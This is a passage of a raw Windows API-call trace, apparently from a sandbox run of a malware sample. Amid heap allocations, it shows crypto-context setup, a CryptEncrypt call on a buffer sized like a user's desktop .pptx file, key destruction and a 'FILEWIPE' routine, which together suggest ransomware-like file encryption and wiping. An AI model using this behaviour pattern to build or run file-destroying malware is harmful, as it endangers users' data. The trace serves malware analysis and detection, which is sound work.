hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da90 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.465] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.465] CryptGetKeyParam (in: hKey=0x6b8ab8, dwParam=0x7, pbData=0x6bb628, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb628*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.465] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.465] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.466] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.466] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.481] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0x3ec3, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0x3ed0) returned 1 [0075.481] CharLowerBuffW (in: lpsz="byte[16081]", cchLength=0xb | out: lpsz="byte[16081]") returned 0xb [0075.481] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.481] CryptEncrypt (in: hKey=0x6b8ab8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x799ec8*, pdwDataLen=0x61e2d8*=0x3ec3, dwBufLen=0x3ed0 | out: pbData=0x799ec8*, pdwDataLen=0x61e2d8*=0x3ed0) returned 1 [0075.482] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.482] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.484] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.484] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.484] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.484] CryptDestroyKey (hKey=0x6b8ab8) returned 1 [0075.485] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.485] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.485] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.485] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.485] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76dfd0 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0a8 [0075.485] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.486] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.486] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.488] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0075.489] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\-bwOHNgAEohzwnBTD\\VmWpxwQdQUQhtrKz9rx.pptx", lpFindFileData=0x61e858 | out: lpFindFileData=0x61e858*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e4617a0, ftCreationTime.dwHighDateTime=0x1d5e321, ftLastAccessTime.dwLowDateTime=0x787174a0, ftLastAccessTime.dwHighDateTime=0x1d5d7ed, ftLastWriteTime.dwLowDateTime=0x787174a0, ftLastWriteTime.dwHighDateTime=0x1d5d7ed, nFileSizeHigh=0x0, nFileSizeLow=0x3ec3, dwReserved0=0x0, dwReserved1=0x657690, cFileName="VmWpxwQdQUQhtrKz9rx.pptx", cAlternateFileName="VMWPXW~1.PPT")) returned 0x6b89f8 [0075.489] FindClose (in: hFindFile=0x6b89f8 | out: hFindFile=0x6b89f8) returned 1 [0075.489] CharLowerBuffW (in: lpsz="byte[16067]", cchLength=0xb | out: lpsz="byte[16067]") returned 0xb [0075.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0075.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690820 [0075.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0075.489] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690710 [0075.490] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0075.490] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.490] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f90000 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0075.490] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x7) returned 0x6bb4c8 [0075.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x6bb4c8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0075.490] FreeLibrary (hLibModule=0x76f90000) returned 1 [0075.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0075.490] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908b0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0a8 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e378 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad30 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x792238 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a49f0 [0075.491] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a49f0 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.491] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e078 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68db80 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae68 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690710 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68da68 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.492] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dab8 | out: hHeap=0x650000) returned 1 [0075.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690710 [0075.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6906d0 [0075.492] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0075.492] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6906d0 | out: hHeap=0x650000) returned 1 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6906d0 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da68 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690820 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690820 | out: hHeap=0x650000) returned 1 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690820 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690930 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690930 | out: hHeap=0x650000) returned 1 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690930 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e078 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db80 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0075.493] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.493] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0075.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfb8 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df68 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908b0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acd0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690780 [0075.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690780 | out: hHeap=0x650000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e348 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690780 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6908e0 [0075.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0075.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dbd0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0075.494] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.494] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0075.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e018 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0075.495] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dcc0 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.495] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb378 | out: hHeap=0x650000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb378 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68db08 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfd0 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0075.496] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0075.496] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 